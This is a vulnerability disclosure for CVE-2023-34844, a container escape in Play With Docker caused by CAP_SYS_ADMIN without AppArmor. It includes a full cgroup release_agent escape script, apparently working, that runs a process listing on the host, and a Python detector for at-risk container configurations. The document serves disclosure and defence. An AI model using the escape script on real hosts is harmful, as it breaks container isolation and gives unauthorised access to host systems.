https://labs.play-with-docker.com/

https://github.com/play-with-docker/play-with-docker

Play With Docker < 0.0.2 runs sandboxes in an insecure CAP_SYS_ADMIN privileged mode: CAP_SYS_ADMIN is required by the service, but no AppArmor profile is set, so the Docker container can escape to the host.

### Description

Play With Docker < 0.0.2 has an insecure CAP_SYS_ADMIN privileged mode that allows the Docker container to escape.

- ID: CVE-2023-34844
- PRODUCT: Play With Docker
- VERSION: < 0.0.2
- PROBLEM TYPE: Docker container escape

Screenshots:

- https://hacku.top/?module=custom_actions&action=open_in_browser&path=%2FROOT%2FHOME%2FCVE-2023-34844%2F1.png
- https://hacku.top/?module=custom_actions&action=open_in_browser&path=%2FROOT%2FHOME%2FCVE-2023-34844%2F2.png
- https://hacku.top/?module=custom_actions&action=open_in_browser&path=%2FROOT%2FHOME%2FCVE-2023-34844%2F3.png
- https://hacku.top/?module=custom_actions&action=open_in_browser&path=%2FROOT%2FHOME%2FCVE-2023-34844%2F4.png

### full exploit

```bash
#!/bin/sh

OUTPUT_DIR="/"
MAX_PID=65535
CGROUP_NAME="xyx"
CGROUP_MOUNT="/tmp/cgrp"
PAYLOAD_NAME="${CGROUP_NAME}_payload.sh"
PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}"
OUTPUT_NAME="${CGROUP_NAME}_payload.out"
OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}"

# Run a process we can search for in the host process list (not needed in reality, but nice to have)
sleep 10000 &

# Prepare the payload script to execute on the host
cat > ${PAYLOAD_PATH} << __EOF__
#!/bin/sh

OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}

# Commands to run on the host
ps -eaf > \${OUTPATH} 2>&1
__EOF__

# Make the payload script executable
chmod a+x ${PAYLOAD_PATH}

# Set up the cgroup mount using the memory resource cgroup controller
mkdir ${CGROUP_MOUNT}
mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
mkdir ${CGROUP_MOUNT}/${CGROUP_NAME}
echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release

# Brute force the host pid until the output path is created, or we run out of guesses
TPID=1
while [ ! -f ${OUTPUT_PATH} ]
do
  if [ $((${TPID} % 100)) -eq 0 ]
  then
    echo "Checking pid ${TPID}"
    if [ ${TPID} -gt ${MAX_PID} ]
    then
      echo "Exiting at ${MAX_PID} :-("
      exit 1
    fi
  fi

  # Set the release_agent path to the guessed pid
  echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent

  # Trigger execution of the release_agent
  sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"

  TPID=$((${TPID} + 1))
done

# Wait for and cat the output
sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}
```

Report disclosed by GhostAatrox :P
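As an added defender-side check (example code written for this report, not part of Play With Docker), the following Python script scans `docker inspect` output for the combination this CVE depends on: CAP_SYS_ADMIN (or `--privileged`) together with an unconfined AppArmor profile. The inspect JSON is constructed sample data; with the `docker-default` profile applied, its deny rule on mount(2) blocks the cgroup mount that the escape above relies on.

```python
"""Flag containers that combine CAP_SYS_ADMIN with an unconfined AppArmor profile,
the CVE-2023-34844 pattern. SAMPLE_INSPECT is constructed `docker inspect` output."""
import json

# Constructed sample `docker inspect` output for two containers (not real data).
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/pwd-sandbox",
        "AppArmorProfile": "",
        "HostConfig": {"Privileged": False, "CapAdd": ["SYS_ADMIN"],
                       "SecurityOpt": ["apparmor=unconfined"]},
    },
    {
        "Name": "/hardened",
        "AppArmorProfile": "docker-default",
        "HostConfig": {"Privileged": False, "CapAdd": ["CAP_NET_ADMIN"],
                       "SecurityOpt": None},
    },
])


def has_sys_admin(host_cfg):
    """True when the container holds CAP_SYS_ADMIN: added explicitly, via ALL, or via --privileged."""
    caps = set()
    for cap in host_cfg.get("CapAdd") or []:
        cap = cap.upper()
        caps.add(cap[4:] if cap.startswith("CAP_") else cap)
    return bool(host_cfg.get("Privileged")) or bool(caps & {"SYS_ADMIN", "ALL"})


def apparmor_unconfined(container):
    """True when no AppArmor profile confines the container (explicit unconfined or none loaded)."""
    opts = container["HostConfig"].get("SecurityOpt") or []
    if "apparmor=unconfined" in opts:
        return True
    return container.get("AppArmorProfile", "") in ("", "unconfined")


def find_escape_candidates(inspect_json):
    """Return names of containers with CAP_SYS_ADMIN and no AppArmor confinement."""
    return [c["Name"] for c in json.loads(inspect_json)
            if has_sys_admin(c["HostConfig"]) and apparmor_unconfined(c)]


if __name__ == "__main__":
    for name in find_escape_candidates(SAMPLE_INSPECT):
        print(f"AT RISK: {name} has CAP_SYS_ADMIN and no AppArmor profile")
```

On a live host, feed it the output of `docker inspect $(docker ps -q)` instead of the embedded sample.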